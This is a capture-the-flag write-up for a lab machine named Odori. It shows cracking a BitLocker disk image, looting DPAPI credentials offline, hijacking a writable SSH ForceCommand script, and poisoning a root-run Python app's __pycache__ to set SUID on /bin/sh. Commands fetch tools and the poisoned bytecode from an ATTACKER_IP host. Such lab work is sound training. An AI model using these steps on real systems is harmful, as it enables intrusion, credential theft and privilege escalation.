Machine - Odori
Writeup Author: bryanmcnulty
Overview
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
VMware Disk Image
We are given a disk image, file02.vmdk.
mkdir disk-image && cd disk-image
# Extract raw partition image
7z l ../file02.vmdk
7z e ../file02.vmdk '2.Basic data partition.img'
From here we try mounting the partition, but find that it is encrypted with BitLocker.
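As a quick, optional confirmation, the BitLocker volume header carries the OEM signature -FVE-FS- a few bytes into the partition image:
# Look for the "-FVE-FS-" signature near the start of the volume
xxd -l 16 "2.Basic data partition.img"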
Cracking BitLocker Encryption
To recover this partition, we must crack the encryption password. bitlocker2john from John the Ripper can be used to extract a crackable hash from the disk image.
bitlocker2john -i ./"2.Basic data partition.img" |
grep '^$bitlocker' > ../bitlocker.john
We cracked the password using the classic rockyou.txt wordlist.
john --wordlist=/opt/rockyou.txt ./bitlocker.john # Should crack relatively quickly
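Once the run completes, John can print the recovered password from its pot file:
# Show the cracked BitLocker password
john --show ./bitlocker.john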
Disk Forensics
We first mounted the disk image using cryptsetup and mount.
# Open & decrypt disk image (enter BitLocker password at prompt)
sudo cryptsetup open --type=bitlk ./"2.Basic data partition.img" odori
# Mount decrypted partition
mkdir ./mount
sudo mount -o ro /dev/mapper/odori ./mount
We find the first flag at Users/Administrator/Desktop/flag.txt
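Reading it straight off the read-only mount (sudo may be needed depending on how the mount maps file ownership):
sudo cat ./mount/Users/Administrator/Desktop/flag.txt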
Looting DPAPI Offline
We found some scheduled task credentials while performing an offline DPAPI triage of the mounted filesystem with dploot.
# Offline DPAPI machine triage against the mounted volume
dploot machinetriage -root ./mount -t local
dploot (https://github.com/zblurx/dploot) v3.0.1 by @_zblurx
[*] Connected to local as \ (admin)
[*] Triage SYSTEM masterkeys
{0fa91fd0-990c-4a7e-b7a9-e9cd72b0e344}:[REDACTED]
{23c71bc0-dcbc-448f-b144-26c2296c1dd7}:[REDACTED]
{4d0608b6-2a96-4d6b-9c81-b03c91485ea6}:[REDACTED]
{bb3025a7-e7d7-405e-bb83-13113f771deb}:[REDACTED]
[*] Triage SYSTEM Credentials
[CREDENTIAL]
LastWritten : 2025-01-11 13:27:40
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:batch=TaskScheduler:Task:{EB952370-3B64-45F3-814D-6F47F413A8D8}
Description :
Unknown :
Username : FILE02\svc_backup
Unknown : [REDACTED]
...
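As an optional sanity check, the looted password can be validated over SMB before touching SSH; svc_backup looks like a local FILE02 account, so --local-auth is assumed here:
# Validate the scheduled-task credential against SMB
nxc smb $rhosts -u svc_backup -p "$auth_pass" --local-auth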
SSH
The discovered credentials work over SSH, but no shell is provided, likely due to a forced command in the SSH configuration.
nxc ssh $rhosts -u svc_backup -p "$auth_pass"
We can still copy files using scp though!
scp -r svc_backup@$rhosts:/home/svc_backup .
Got the second user flag @ /home/svc_backup/flag.txt!
Let's check /etc/ssh/sshd_config to see what command is run when an SSH session is established.
scp -r svc_backup@$rhosts:/etc/ssh/sshd_config .
grep -Ev '^\s*(#|$)' sshd_config
Include /etc/ssh/sshd_config.d/*.conf
PermitRootLogin yes
KbdInteractiveAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
Match group svc_backup
ForceCommand /opt/restrict /home/%u
AllowTcpForwarding no
When we log in, the command /opt/restrict /home/svc_backup is run. It also looks like we can use SFTP.
sftp svc_backup@$rhosts # Enter password at prompt
sftp> ls -la
drwxr-x--- 5 svc_backup svc_backup 4096 Jan 15 20:39 .
drwxr-xr-x 4 root root 4096 Jan 11 10:48 ..
lrwxrwxrwx 1 root root 9 Jan 11 10:49 .bash_history
-rw-r--r-- 1 svc_backup svc_backup 220 Jan 11 10:48 .bash_logout
-rw-r--r-- 1 svc_backup svc_backup 3771 Jan 11 10:48 .bashrc
drwx------ 2 svc_backup svc_backup 4096 Jan 11 10:53 .cache
drwxrwxr-x 3 svc_backup svc_backup 4096 Jan 15 20:39 .local
-rw-r--r-- 1 svc_backup svc_backup 807 Jan 11 10:48 .profile
drwxr-xr-x 2 svc_backup svc_backup 4096 Jan 11 10:50 .ssh
-rw-rw---- 1 svc_backup svc_backup 37 Jan 15 20:39 flag.txt
sftp> cd /opt
sftp> ls -la
drwxr-xr-x 3 root root 4096 Jan 11 19:44 .
drwxr-xr-x 21 root root 4096 Jan 11 19:42 ..
drwxr-xr-x 3 root root 4096 Jan 16 21:15 archiver
-rwxrwxr-x 1 svc_backup root 48 Jan 11 19:44 restrict
sftp>
We find that the script invoked in ForceCommand, /opt/restrict, is actually writable! This means we can write arbitrary commands into the script, and they will be executed when an SSH session is established.
#!/bin/bash
# Original /opt/restrict: serve SFTP starting in the given directory
/usr/lib/openssh/sftp-server -d $1
#!/bin/bash
# Our replacement: just spawn an interactive shell
bash -i
We uploaded the new restrict script via scp, then connected to the target via SSH and established a shell!
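A minimal sketch of that step, assuming our modified script is saved locally as ./restrict and reusing the variables from earlier:
# Overwrite the writable ForceCommand script over SFTP, then reconnect
scp ./restrict svc_backup@$rhosts:/opt/restrict
ssh svc_backup@$rhosts # ForceCommand now drops us into bash -i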
Privilege Escalation
We found a small Python application at /opt/archiver. Using pspy, we found that /opt/archiver/app.py is run at a regular interval by root.
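Roughly how the pspy check looks, assuming the pspy64 release binary and that the target can fetch files from our machine (ATTACKER_IP is a placeholder):
# On the attacking machine: serve pspy64 over HTTP
python3 -m http.server 8000
# In the SSH shell on the target:
wget http://ATTACKER_IP:8000/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64
/tmp/pspy64 # watch for the periodic root execution of /opt/archiver/app.py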
Archiver Application
The application doesn't do much. app.py scans /backup for files older than three years and passes them to helper.py for archiving:
import os
from datetime import datetime, timedelta

from helper import tar_and_move_files

backup_dir = '/backup'
archive_dir = '/archive'
threshold_date = datetime.now() - timedelta(days=3*365)


def scan_and_archive_files():
    if not os.path.exists(archive_dir):
        os.makedirs(archive_dir)

    for root, dirs, files in os.walk(backup_dir):
        for file in files:
            file_path = os.path.join(root, file)
            file_mod_time = datetime.fromtimestamp(os.path.getmtime(file_path))

            if file_mod_time < threshold_date:
                print(f'Moving {file_path} to archive...')
                tar_and_move_files(file_path, archive_dir)
            else:
                print(f'{file_path} is not old enough to archive.')


if __name__ == '__main__':
    scan_and_archive_files()
# helper.py: tar the file into the archive directory, then delete the original
import os
import subprocess
from datetime import datetime


def tar_and_move_files(file_path, archive_dir):
    current_date = datetime.now().strftime('%Y-%m-%d')
    tar_filename = os.path.join(archive_dir, f'{current_date}_{os.path.basename(file_path)}.tar.gz')
    subprocess.Popen(["/usr/bin/tar", "-czf", tar_filename, "-C", os.path.dirname(file_path), os.path.basename(file_path)])
    os.remove(file_path)
The /opt/archiver/__pycache__ directory is writable by all users, and contains compiled bytecode for the application at /opt/archiver/__pycache__/helper.cpython-310.pyc.
total 20
drwxr-xr-x 3 root root 4096 Jan 16 21:15 .
drwxr-xr-x 3 root root 4096 Jan 11 19:44 ..
-rw-r--r-- 1 root root 812 Jan 11 19:42 app.py
-rw-r--r-- 1 root root 412 Jan 16 21:15 helper.py
drwxr-xrwx 2 root root 4096 Jan 16 21:15 __pycache__
-rw-r--r-- 1 root root 566 Jan 16 21:15 __pycache__/helper.cpython-310.pyc
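A quick way to confirm what we can actually touch under /opt/archiver is GNU find's -writable test:
# Only the __pycache__ directory should come back as writable for our user
find /opt/archiver -writable 2>/dev/null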
Hijacking Python Application via __pycache__
Since the __pycache__ directory is writable, we can replace the compiled code for helper.py in helper.cpython-310.pyc.
https://realpython.com/python-pycache/#what-actions-invalidate-the-cache
We made a local copy of the application, added a malicious call to os.chmod, installed the same Python version that the remote machine has (3.10.12), and compiled the bytecode with unchecked-hash invalidation so Python never compares our .pyc against the original helper.py.
import os
import subprocess
from datetime import datetime

os.chmod('/bin/sh', 0o4755)  # Add SUID bit to /bin/sh


def tar_and_move_files(file_path, archive_dir):
    current_date = datetime.now().strftime('%Y-%m-%d')
    tar_filename = os.path.join(archive_dir, f'{current_date}_{os.path.basename(file_path)}.tar.gz')
    subprocess.Popen(["/usr/bin/tar", "-czf", tar_filename, "-C", os.path.dirname(file_path), os.path.basename(file_path)])
    os.remove(file_path)
pyenv install "3.10.12"
pyenv shell "3.10.12"
python3 -m compileall --invalidation-mode unchecked-hash .
# Now we should have our own helper.cpython-310.pyc
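Optionally, the invalidation mode can be confirmed by inspecting the 16-byte .pyc header: per PEP 552, the 4-byte flags word after the magic number is 1 for a hash-based pyc whose source hash is not checked at import time.
# Bytes 4-7 (little-endian flags) should read 01 00 00 00: hash-based, unchecked
xxd -l 16 ./__pycache__/helper.cpython-310.pyc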
We then used our write permissions to delete and replace /opt/archiver/__pycache__/helper.cpython-310.pyc with our unchecked-hash bytecode.
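A rough sketch of the swap; since our new ForceCommand shell replaced the SFTP server, scp may no longer work, so this assumes the same HTTP transfer trick (ATTACKER_IP is a placeholder):
# On the attacking machine: serve the poisoned bytecode
python3 -m http.server 8000
# In the SSH shell on the target: the directory (not the file) is writable,
# so unlink the root-owned .pyc and drop ours in its place
wget http://ATTACKER_IP:8000/helper.cpython-310.pyc -O /tmp/helper.cpython-310.pyc
rm -f /opt/archiver/__pycache__/helper.cpython-310.pyc
cp /tmp/helper.cpython-310.pyc /opt/archiver/__pycache__/helper.cpython-310.pyc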
Waited a bit and ran /bin/sh -p for a root shell :)
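Roughly what the final check looks like (ls -L dereferences /bin/sh in case it is a symlink to dash):
ls -lL /bin/sh # SUID bit ("rws") should appear once the job has run as root
/bin/sh -p     # -p keeps the elevated effective UID
id             # expect euid=0(root)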